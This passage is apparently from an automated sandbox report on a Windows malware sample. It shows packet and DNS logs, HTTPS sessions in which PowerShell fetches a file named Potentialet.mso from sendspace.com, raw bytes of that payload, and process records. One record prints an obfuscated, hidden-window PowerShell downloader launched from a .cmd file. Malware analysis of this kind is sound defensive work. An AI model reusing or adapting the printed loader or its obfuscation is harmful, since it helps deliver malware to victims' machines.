                                                May 23, 2024 21:03:31.608258009 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.608278036 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.608334064 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.608346939 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.608383894 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.612067938 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.612092972 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.612219095 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.612241030 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.612283945 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.615818024 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.615844011 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.615914106 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.615931988 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.615994930 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.619498968 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.619549990 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.619575024 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.619585991 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.619606972 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.619678020 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.623039007 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.623070955 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.623152018 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.623178959 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.623195887 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.623217106 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.626292944 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.626321077 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.626373053 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.626390934 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.626420021 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.626436949 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.628815889 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.628853083 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.628989935 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.628989935 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.629014015 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.629100084 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.629645109 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.629707098 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.629751921 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.636651039 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.636687994 CEST4434970569.31.136.53192.168.2.5

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                May 23, 2024 21:03:28.970252991 CEST5604353192.168.2.51.1.1.1
                                                May 23, 2024 21:03:28.981745005 CEST53560431.1.1.1192.168.2.5
                                                May 23, 2024 21:03:29.848505974 CEST5740853192.168.2.51.1.1.1
                                                May 23, 2024 21:03:29.867526054 CEST53574081.1.1.1192.168.2.5
                                                May 23, 2024 21:03:48.401582003 CEST53518411.1.1.1192.168.2.5
                                                May 23, 2024 21:03:49.883737087 CEST53614501.1.1.1192.168.2.5
                                                May 23, 2024 21:03:51.637762070 CEST6384353192.168.2.51.1.1.1
                                                May 23, 2024 21:03:51.711632967 CEST53638431.1.1.1192.168.2.5

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                May 23, 2024 21:03:28.970252991 CEST192.168.2.51.1.1.10xdabeStandard query (0)www.sendspace.comA (IP address)IN (0x0001)false
                                                May 23, 2024 21:03:29.848505974 CEST192.168.2.51.1.1.10x83f6Standard query (0)fs12n5.sendspace.comA (IP address)IN (0x0001)false
                                                May 23, 2024 21:03:51.637762070 CEST192.168.2.51.1.1.10x196dStandard query (0)50.23.12.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                May 23, 2024 21:03:28.981745005 CEST1.1.1.1192.168.2.50xdabeNo error (0)www.sendspace.com172.67.170.105A (IP address)IN (0x0001)false
                                                May 23, 2024 21:03:28.981745005 CEST1.1.1.1192.168.2.50xdabeNo error (0)www.sendspace.com104.21.28.80A (IP address)IN (0x0001)false
                                                May 23, 2024 21:03:29.867526054 CEST1.1.1.1192.168.2.50x83f6No error (0)fs12n5.sendspace.com69.31.136.53A (IP address)IN (0x0001)false
                                                May 23, 2024 21:03:51.711632967 CEST1.1.1.1192.168.2.50x196dName error (3)50.23.12.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • www.sendspace.com
                                                • fs12n5.sendspace.com

                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.549704172.67.170.1054435256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-23 19:03:29 UTC174OUTGET /pro/dl/ogm6qc HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                Host: www.sendspace.com
                                                Connection: Keep-Alive
                                                2024-05-23 19:03:29 UTC943INHTTP/1.1 301 Moved Permanently
                                                Date: Thu, 23 May 2024 19:03:29 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Set-Cookie: SID=m93ic7teca95s3jppr9t1250a6; path=/; domain=.sendspace.com
                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                Pragma: no-cache
                                                Location: https://fs12n5.sendspace.com/dlpro/6afd7b9629aca833864bae4c7487d4d4/664f9301/ogm6qc/Potentialet.mso
                                                Vary: Accept-Encoding
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L%2FxAwkApkyx6xVRd%2FD1VQ4JJar9EdMbA4Bc2ppcQhxXpSSvIp1awBUjjEnrzDLBxTA%2BR1%2B6oNzlyrd3A3YmEuxJ6xAAov1MJyZ2GQzPJxmdMgX6v3gZ7Dvs0lSlFUig4FDG1nw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 88874e6a6bbb7c9a-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-05-23 19:03:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.54970569.31.136.534435256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-23 19:03:30 UTC234OUTGET /dlpro/6afd7b9629aca833864bae4c7487d4d4/664f9301/ogm6qc/Potentialet.mso HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                Host: fs12n5.sendspace.com
                                                Connection: Keep-Alive
                                                2024-05-23 19:03:31 UTC500INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 23 May 2024 19:03:30 GMT
                                                Content-Type: application/octet-stream
                                                Content-Length: 441332
                                                Last-Modified: Mon, 20 May 2024 13:39:51 GMT
                                                Connection: close
                                                Set-Cookie: SID=befm2387rj5i75i2i1fsfb4517; path=/; domain=.sendspace.com
                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                Content-Disposition: attachment;filename="Potentialet.mso"
                                                ETag: "664b52a7-6bbf4"
                                                Accept-Ranges: bytes
                                                2024-05-23 19:03:31 UTC15884INData Raw: 63 51 47 62 36 77 4c 4d 74 62 75 65 38 67 77 41 36 77 4a 71 4e 58 45 42 6d 77 4e 63 4a 41 52 78 41 5a 74 78 41 5a 75 35 38 44 42 68 62 58 45 42 6d 33 45 42 6d 34 48 78 2b 30 72 7a 30 33 45 42 6d 2b 73 43 4a 38 4b 42 77 66 57 46 62 55 46 78 41 5a 74 78 41 5a 76 72 41 6c 69 4a 63 51 47 62 75 6d 43 6b 31 2f 46 78 41 5a 76 72 41 73 6b 42 36 77 4a 61 42 33 45 42 6d 7a 48 4b 36 77 49 37 73 6e 45 42 6d 34 6b 55 43 33 45 42 6d 2b 73 43 53 69 44 52 34 75 73 43 4d 4d 4c 72 41 6e 78 52 67 38 45 45 63 51 47 62 36 77 49 63 42 49 48 35 49 6f 43 31 41 6e 7a 4b 36 77 4b 43 4a 48 45 42 6d 34 74 45 4a 41 54 72 41 6d 44 79 63 51 47 62 69 63 50 72 41 68 70 76 63 51 47 62 67 63 4e 56 67 68 51 42 36 77 49 63 54 48 45 42 6d 37 70 2b 4d 6f 55 5a 36 77 49 48 77 65 73 43 6d 55 61
                                                Data Ascii: cQGb6wLMtbue8gwA6wJqNXEBmwNcJARxAZtxAZu58DBhbXEBm3EBm4Hx+0rz03EBm+sCJ8KBwfWFbUFxAZtxAZvrAliJcQGbumCk1/FxAZvrAskB6wJaB3EBmzHK6wI7snEBm4kUC3EBm+sCSiDR4usCMMLrAnxRg8EEcQGb6wIcBIH5IoC1AnzK6wKCJHEBm4tEJATrAmDycQGbicPrAhpvcQGbgcNVghQB6wIcTHEBm7p+MoUZ6wIHwesCmUa
                                                2024-05-23 19:03:31 UTC16384INData Raw: 54 6b 37 78 71 79 71 4f 6a 33 48 77 53 4a 6a 78 69 49 68 46 6a 70 72 6d 31 63 38 57 37 46 72 77 51 56 65 41 44 61 33 77 45 4c 64 55 76 68 52 72 6e 57 45 53 72 31 41 77 50 53 79 69 45 34 78 59 6f 68 4c 42 58 4b 41 53 52 6f 70 55 31 47 73 44 56 4e 52 72 41 38 73 66 76 32 6d 6a 34 42 70 30 4d 30 2f 48 33 37 78 79 6e 45 55 34 70 30 43 6b 63 76 6d 50 32 6d 7a 58 35 56 5a 4f 4d 65 7a 67 31 53 66 32 72 61 76 45 50 62 30 77 78 49 46 4c 31 53 49 45 52 49 5a 52 36 76 56 2f 45 4a 36 76 31 52 4b 4c 62 6d 5a 4b 4f 70 2f 64 4e 57 49 79 79 56 47 54 63 6b 70 53 63 77 57 4e 56 34 75 41 2b 6f 44 71 6c 49 77 69 74 72 69 42 77 6a 2f 64 44 38 54 63 4e 6f 48 65 78 5a 69 37 43 36 42 31 35 7a 78 4c 68 36 69 4e 37 73 67 4b 56 5a 68 6c 55 44 59 51 67 72 2f 77 37 62 64 78 50 55 4d
                                                Data Ascii: Tk7xqyqOj3HwSJjxiIhFjprm1c8W7FrwQVeADa3wELdUvhRrnWESr1AwPSyiE4xYohLBXKASRopU1GsDVNRrA8sfv2mj4Bp0M0/H37xynEU4p0CkcvmP2mzX5VZOMezg1Sf2ravEPb0wxIFL1SIERIZR6vV/EJ6v1RKLbmZKOp/dNWIyyVGTckpScwWNV4uA+oDqlIwitriBwj/dD8TcNoHexZi7C6B15zxLh6iN7sgKVZhlUDYQgr/w7bdxPUM
                                                2024-05-23 19:03:31 UTC16384INData Raw: 75 31 2f 69 50 4f 4e 77 35 4d 55 53 38 44 4e 53 30 34 48 73 4c 53 47 52 41 52 65 6e 58 6d 6e 35 42 51 70 69 36 6d 72 2b 46 45 6b 6f 57 53 41 61 78 74 38 4e 73 4c 63 55 39 56 52 6d 30 54 53 42 61 5a 6c 53 6f 6b 2f 49 4e 49 72 42 74 6d 6b 44 56 46 32 70 55 64 39 42 43 51 46 55 31 49 4f 35 59 64 42 72 78 4e 48 6c 61 51 4e 55 32 59 34 49 69 6f 4c 56 4e 66 73 4f 34 6f 4b 53 51 61 76 35 45 6c 57 46 34 46 73 42 75 34 70 4b 61 72 33 2f 67 41 44 64 34 73 4a 4d 73 4a 68 2f 6a 74 33 37 55 38 77 46 76 6c 6e 62 56 36 6a 70 68 64 38 49 5a 6d 70 65 46 68 57 6e 71 71 6e 66 37 37 4e 64 42 6d 34 7a 59 4d 4e 6d 36 76 45 74 55 64 73 2f 31 52 59 46 38 37 79 38 36 75 6c 75 53 44 45 66 31 52 62 41 78 52 33 78 4f 70 2f 64 4e 57 49 53 79 65 32 67 63 6c 5a 4a 61 59 4a 52 54 6a 44
                                                Data Ascii: u1/iPONw5MUS8DNS04HsLSGRARenXmn5BQpi6mr+FEkoWSAaxt8NsLcU9VRm0TSBaZlSok/INIrBtmkDVF2pUd9BCQFU1IO5YdBrxNHlaQNU2Y4IioLVNfsO4oKSQav5ElWF4FsBu4pKar3/gADd4sJMsJh/jt37U8wFvlnbV6jphd8IZmpeFhWnqqnf77NdBm4zYMNm6vEtUds/1RYF87y86uluSDEf1RbAxR3xOp/dNWISye2gclZJaYJRTjD
                                                2024-05-23 19:03:31 UTC16384INData Raw: 61 72 51 34 6e 74 55 56 70 4e 7a 74 2f 44 75 66 33 54 52 69 43 38 6d 79 37 76 73 76 32 69 52 68 5a 33 52 63 52 4c 34 70 35 39 58 49 62 43 46 65 61 68 79 4b 73 30 39 50 53 34 56 43 6a 72 35 2f 77 57 70 32 74 63 76 66 58 47 6c 61 30 66 63 70 51 6b 61 6c 7a 41 32 70 33 49 65 48 6a 4a 33 43 66 34 33 71 4e 33 43 2f 30 4c 36 70 50 4f 66 6f 56 39 51 35 75 58 39 56 37 37 76 56 46 67 4e 65 2b 64 2f 71 36 55 37 4c 4c 4c 6a 56 46 75 78 43 51 53 4d 37 6e 39 30 30 59 68 50 4a 55 61 6c 7a 58 66 35 62 34 68 75 56 37 75 79 34 34 59 71 73 74 7a 54 38 69 74 34 47 35 73 57 50 62 50 30 78 34 37 59 74 4f 70 61 4d 4f 62 6b 72 70 61 45 66 31 53 37 52 41 31 54 55 5a 49 63 4a 30 57 38 44 44 6f 37 69 6a 69 76 56 61 77 50 64 46 54 71 49 32 61 74 71 41 31 51 38 58 4e 78 57 31 47 51
                                                Data Ascii: arQ4ntUVpNzt/Duf3TRiC8my7vsv2iRhZ3RcRL4p59XIbCFeahyKs09PS4VCjr5/wWp2tcvfXGla0fcpQkalzA2p3IeHjJ3Cf43qN3C/0L6pPOfoV9Q5uX9V77vVFgNe+d/q6U7LLLjVFuxCQSM7n900YhPJUalzXf5b4huV7uy44YqstzT8it4G5sWPbP0x47YtOpaMObkrpaEf1S7RA1TUZIcJ0W8DDo7ijivVawPdFTqI2atqA1Q8XNxW1GQ
                                                2024-05-23 19:03:31 UTC16384INData Raw: 71 68 48 71 4b 65 62 61 58 2f 7a 56 35 6a 2b 41 30 74 58 76 32 74 58 6d 73 70 6e 2b 72 4f 72 42 78 43 7a 32 41 39 55 2b 35 2f 76 4a 31 4f 2f 6c 6b 39 61 49 55 4f 55 61 36 67 47 71 35 55 33 79 31 65 5a 4d 65 6c 57 39 44 61 71 30 51 4f 6f 78 32 48 71 71 56 54 4a 52 75 7a 75 70 56 61 6e 4c 46 51 78 6a 67 72 34 51 4b 74 74 63 37 4b 47 48 6f 78 4e 70 62 2f 59 4f 41 6f 4a 6d 6c 39 76 65 32 6c 56 42 78 48 71 4a 61 59 4a 6d 2b 70 36 4c 44 62 4c 75 77 54 49 6a 72 48 45 52 45 2b 35 37 56 74 52 72 4c 49 37 36 70 49 4c 68 72 47 6b 44 56 49 58 6d 2f 59 70 56 33 6e 74 57 31 47 73 4e 53 79 34 73 67 75 47 73 61 51 4e 55 70 79 4d 70 41 70 61 55 6a 69 7a 57 61 77 4d 68 49 31 50 33 46 68 4e 70 48 6e 2f 71 72 34 65 63 56 56 6d 31 32 59 54 64 68 34 31 56 57 52 2f 71 4a 39 77
                                                Data Ascii: qhHqKebaX/zV5j+A0tXv2tXmspn+rOrBxCz2A9U+5/vJ1O/lk9aIUOUa6gGq5U3y1eZMelW9Daq0QOox2HqqVTJRuzupVanLFQxjgr4QKttc7KGHoxNpb/YOAoJml9ve2lVBxHqJaYJm+p6LDbLuwTIjrHERE+57VtRrLI76pILhrGkDVIXm/YpV3ntW1GsNSy4sguGsaQNUpyMpApaUjizWawMhI1P3FhNpHn/qr4ecVVm12YTdh41VWR/qJ9w
                                                2024-05-23 19:03:31 UTC16384INData Raw: 6d 4f 79 4d 67 6d 65 32 37 64 70 6f 56 5a 55 57 72 41 34 32 5a 57 30 63 34 72 36 63 31 57 73 44 2f 4b 58 55 4f 77 46 34 73 7a 75 4e 56 61 77 75 44 39 52 50 67 71 4f 53 4d 4b 41 79 37 49 77 2b 6a 58 48 34 41 74 55 54 69 68 65 6b 73 57 72 34 33 32 6d 6a 41 6c 54 55 72 41 41 31 38 44 2f 36 4d 75 32 6a 67 6e 2b 7a 39 34 46 43 73 6c 59 4f 48 31 56 59 52 39 34 6c 74 59 65 66 55 4a 32 43 5a 77 61 56 62 51 42 64 2f 76 5a 56 31 47 75 48 6a 32 34 6b 39 68 68 31 6b 34 4b 6d 6d 64 31 70 35 59 50 55 67 30 47 77 56 49 43 72 6f 47 53 48 4b 58 46 6f 41 77 74 56 6d 55 6f 6c 6a 2b 79 44 72 53 37 71 38 52 76 6d 46 70 51 43 61 68 6a 31 47 2b 6e 6f 2f 58 44 62 35 56 33 78 31 32 74 64 62 51 64 71 30 4e 39 42 6e 67 4a 55 31 4f 2f 61 6f 78 58 46 6e 70 32 59 72 41 42 35 62 76 65
                                                Data Ascii: mOyMgme27dpoVZUWrA42ZW0c4r6c1WsD/KXUOwF4szuNVawuD9RPgqOSMKAy7Iw+jXH4AtUTiheksWr432mjAlTUrAA18D/6Mu2jgn+z94FCslYOH1VYR94ltYefUJ2CZwaVbQBd/vZV1GuHj24k9hh1k4Kmmd1p5YPUg0GwVICroGSHKXFoAwtVmUolj+yDrS7q8RvmFpQCahj1G+no/XDb5V3x12tdbQdq0N9BngJU1O/aoxXFnp2YrAB5bve
                                                2024-05-23 19:03:31 UTC16384INData Raw: 30 36 62 61 55 6e 55 45 73 77 4c 4b 34 6a 36 4d 4d 6c 47 69 57 4e 41 48 4d 63 2f 69 32 56 35 4f 38 44 77 33 74 4b 61 46 65 4b 39 72 67 55 6a 56 35 35 30 6f 54 31 5a 37 68 4a 59 31 6e 50 69 44 62 4d 58 71 64 6b 54 75 41 55 35 71 68 74 45 34 4f 62 37 4c 67 71 5a 48 66 34 30 39 56 5a 6d 58 73 35 58 68 67 71 5a 39 55 77 50 5a 56 59 47 55 31 6e 47 6c 69 6d 34 2f 71 74 75 70 2b 36 78 47 46 54 63 51 68 57 4a 71 50 46 76 7a 43 6a 51 4e 4e 78 53 66 41 63 6b 33 53 36 75 6c 31 59 4d 67 74 34 51 35 33 67 48 6d 73 61 55 52 47 45 77 4e 57 58 58 31 63 43 4b 4b 45 74 6f 4f 56 52 34 54 59 33 6f 4e 38 67 52 73 79 54 5a 6f 34 31 36 78 33 57 55 70 4e 74 71 68 41 62 46 68 43 46 4f 59 74 64 48 56 44 4e 63 4e 4f 4a 2f 64 4e 32 49 41 79 62 4a 53 32 79 72 5a 51 45 38 73 51 37 4a
                                                Data Ascii: 06baUnUEswLK4j6MMlGiWNAHMc/i2V5O8Dw3tKaFeK9rgUjV550oT1Z7hJY1nPiDbMXqdkTuAU5qhtE4Ob7LgqZHf409VZmXs5XhgqZ9UwPZVYGU1nGlim4/qtup+6xGFTcQhWJqPFvzCjQNNxSfAck3S6ul1YMgt4Q53gHmsaURGEwNWXX1cCKKEtoOVR4TY3oN8gRsyTZo416x3WUpNtqhAbFhCFOYtdHVDNcNOJ/dN2IAybJS2yrZQE8sQ7J
                                                2024-05-23 19:03:31 UTC16384INData Raw: 69 77 46 53 67 70 59 51 34 5a 65 77 56 61 6e 47 54 56 2f 51 41 6f 56 66 2f 67 46 57 31 47 73 2b 44 63 2b 73 4b 70 50 56 72 57 44 2f 68 65 37 4b 31 65 56 4a 4f 74 6a 34 36 6a 4b 6d 51 45 43 69 72 46 53 55 2f 4e 58 6c 57 4a 72 56 6b 67 32 47 6a 46 57 71 4d 77 52 34 62 59 4b 39 2b 44 75 76 55 69 4b 76 75 5a 50 56 57 78 72 33 30 2b 2f 31 31 65 55 67 59 36 38 72 36 2f 70 76 56 55 4c 52 6c 6b 52 61 67 6d 56 78 4c 74 50 36 45 2b 35 6c 56 74 52 72 39 5a 58 48 68 6f 4c 68 73 6d 6b 44 56 45 62 79 56 43 2b 79 6e 4d 4c 72 73 4f 71 32 4d 74 5a 72 41 32 39 61 77 4d 37 56 65 51 30 42 56 4e 51 33 31 62 75 50 55 38 68 73 4d 69 72 38 32 62 4a 70 41 31 53 68 6e 49 61 4d 6c 51 30 36 6e 68 4e 71 52 52 4e 49 55 59 4a 6c 46 7a 6e 78 51 46 56 61 6f 44 54 31 4c 59 4a 6c 6d 79 4c
                                                Data Ascii: iwFSgpYQ4ZewVanGTV/QAoVf/gFW1Gs+Dc+sKpPVrWD/he7K1eVJOtj46jKmQECirFSU/NXlWJrVkg2GjFWqMwR4bYK9+DuvUiKvuZPVWxr30+/11eUgY68r6/pvVULRlkRagmVxLtP6E+5lVtRr9ZXHhoLhsmkDVEbyVC+ynMLrsOq2MtZrA29awM7VeQ0BVNQ31buPU8hsMir82bJpA1ShnIaMlQ06nhNqRRNIUYJlFznxQFVaoDT1LYJlmyL
                                                2024-05-23 19:03:31 UTC16384INData Raw: 4c 73 71 6d 51 44 4a 41 76 39 53 76 59 68 6a 54 7a 30 2b 44 36 52 5a 50 76 37 68 57 54 2f 4d 54 52 64 46 43 52 55 50 31 68 30 42 72 58 33 43 4f 64 66 72 65 47 54 4c 74 75 31 72 51 44 54 53 49 45 66 51 37 75 34 4b 70 31 44 68 68 76 77 62 54 70 74 46 38 51 4d 58 69 34 6a 4d 72 45 4f 76 56 52 52 38 49 72 6d 57 39 78 51 6e 41 44 65 58 52 32 78 6a 59 32 51 48 51 52 43 37 71 6c 68 5a 62 55 63 52 2f 41 31 52 64 4c 41 73 43 61 75 77 67 45 4a 76 71 39 65 77 73 4f 67 50 56 49 72 6b 44 51 5a 76 69 4e 56 43 42 34 4e 4b 7a 4c 74 4d 65 2b 56 2f 43 6f 44 41 43 56 6c 58 6f 76 30 72 49 61 4d 66 37 34 77 6f 54 4c 41 39 64 46 61 31 48 31 61 4e 6e 6a 57 54 56 34 49 49 54 32 41 50 45 53 76 72 71 62 46 68 37 30 2b 57 70 68 74 48 52 5a 37 72 32 67 71 61 36 37 4a 53 32 56 61 6d
                                                Data Ascii: LsqmQDJAv9SvYhjTz0+D6RZPv7hWT/MTRdFCRUP1h0BrX3COdfreGTLtu1rQDTSIEfQ7u4Kp1DhhvwbTptF8QMXi4jMrEOvVRR8IrmW9xQnADeXR2xjY2QHQRC7qlhZbUcR/A1RdLAsCauwgEJvq9ewsOgPVIrkDQZviNVCB4NKzLtMe+V/CoDACVlXov0rIaMf74woTLA9dFa1H1aNnjWTV4IIT2APESvrqbFh70+WphtHRZ7r2gqa67JS2Vam
                                                2024-05-23 19:03:31 UTC16384INData Raw: 67 71 54 72 50 57 36 45 51 6f 55 45 41 41 70 37 57 62 46 2f 50 50 43 72 47 45 47 77 63 31 36 69 34 73 62 76 59 41 34 57 67 71 58 37 39 62 79 39 48 46 5a 46 35 49 69 48 30 47 58 57 45 44 79 43 70 2b 43 6b 67 70 6c 56 71 43 78 4e 62 77 36 4b 5a 37 32 34 66 58 67 38 68 6a 6e 32 6f 66 53 55 59 79 30 37 53 51 2b 61 33 46 32 55 57 6b 50 6f 42 32 6e 31 53 63 43 52 6f 68 38 43 6a 43 42 59 50 45 4a 31 4b 45 69 48 30 45 46 4a 44 6d 69 43 76 35 58 44 2f 5a 64 56 71 43 53 35 59 71 75 43 6c 77 7a 31 62 71 75 47 39 34 71 32 31 58 47 65 30 52 73 52 45 52 37 30 34 6d 64 61 39 31 43 52 72 62 4c 43 6e 66 44 54 52 59 65 43 4b 6c 69 6b 63 2b 52 6c 64 47 6c 53 76 75 77 36 6a 75 37 53 44 34 62 52 38 6d 47 61 2f 6f 4b 6d 44 34 68 4a 4d 6c 57 42 77 35 66 51 6d 49 70 57 57 33 47
                                                Data Ascii: gqTrPW6EQoUEAAp7WbF/PPCrGEGwc16i4sbvYA4WgqX79by9HFZF5IiH0GXWEDyCp+CkgplVqCxNbw6KZ724fXg8hjn2ofSUYy07SQ+a3F2UWkPoB2n1ScCRoh8CjCBYPEJ1KEiH0EFJDmiCv5XD/ZdVqCS5YquClwz1bquG94q21XGe0RsRER704mda91CRrbLCnfDTRYeCKlikc+RldGlSvuw6ju7SD4bR8mGa/oKmD4hJMlWBw5fQmIpWW3G


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:15:03:24
                                                Start date:23/05/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\kam.cmd" "
                                                Imagebase:0x7ff6e68e0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:1
                                                Start time:15:03:24
                                                Start date:23/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:2
                                                Start time:15:03:24
                                                Start date:23/05/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell.exe -windowstyle hidden "$Kiaki = 1;$Vaabenmnd='Sub';$Vaabenmnd+='strin';$Vaabenmnd+='g';Function Hystadens($Rivalled){$Kortende=$Rivalled.Length-$Kiaki;For($Ransagningskendelsens=5;$Ransagningskendelsens -lt $Kortende;$Ransagningskendelsens+=6){$Indervrelses+=$Rivalled.$Vaabenmnd.Invoke( $Ransagningskendelsens, $Kiaki);}$Indervrelses;}function Billedhuggeren($Dmpningsfaktorernes){&($Searchlights) ($Dmpningsfaktorernes);}$Maimon=Hystadens 'skurvMSekuno Ko,tzplotti Carbl linelAdkvaaKommu/Super5ov,rl. Stje0un ud Karma( .ropWWagwiiPyruvnSyfildTelefoMultiwbrk.osUnpau artiN FibuT orma f,rly1Sj.eg0D,spe. heda0 Loya;A,fot GramWU.kamiStudin Poli6Skatt4Hoard;Bagst Svi.ex Klem6 Sale4Ambis; ,res .onocrFedervFasci:An,at1Nords2.tent1Doven.oopho0Frkap)Co cl ReturGTampoeSn,escSundhk krifocentr/Kigho2 .ooc0Radio1Mo.kr0Merce0Cents1Engol0 nthr1Leuco sn.sFKundsiMy,omr MicreVeterfOptimoLyst xR,pag/ ,xam1Knipl2 Sloo1Thwar. rore0 Trus ';$Cleanlier245=Hystadens ' overU Sam,sStangefi.dyrSta n-C,ookAHamarg nstaeSnavenPrecotisoan ';$Outgnaw=Hystadens ' .redhHaematsnappt Svkkp DiplsYe.rn:Recip/.edtp/Aa dvwS rafwsp,rtw Ta.r. H,lbsAntileEjendnUgunsdH ssesSockhpDuo eaiac.hcSe,sieCockm.Dand,cTe.rio MostmPaleo/S ubopUnvolrA.totoBeton/Gstg d R.sll .nsa/Intero eriegSemicmshivo6FjernqSlagtcPhilt ';$Kragerede=Hystadens 'Proph>Knuck ';$Searchlights=Hystadens ' genni AfteeTr,nsxOutto ';$Eradicated='Tj';$Unvision = Hystadens 'finaneUpayacFrotth nonvoS.bma Balsa%Mise aCamoupUnd,spFor,jdO.ercaOverbtDaab,aIrous% ,eds\cam uT TelecRecr,h Non,i laskcResi.kSanit.El phITena.tTrkvoeXylog Pla i& Benm&Foreg Tur.ueTillbcungulhCliteoHabuk Th nkt Epis ';Billedhuggeren (Hystadens ' Trde$AnnamgVin alvoldto Sul,b .orka .elilSting:GraphBSpasmoUdbl r Acrad.uldsi,eerbnSpatlgS.sed= Su a(BuffwcFro bmXylogdSagvo Primr/DobbecEksdi Drugg$DekleULmarkn Jun.vMuslii VentsBekl.iRut foRigkenGeoem)No di ');Billedhuggeren (Hystadens 'Manip$ 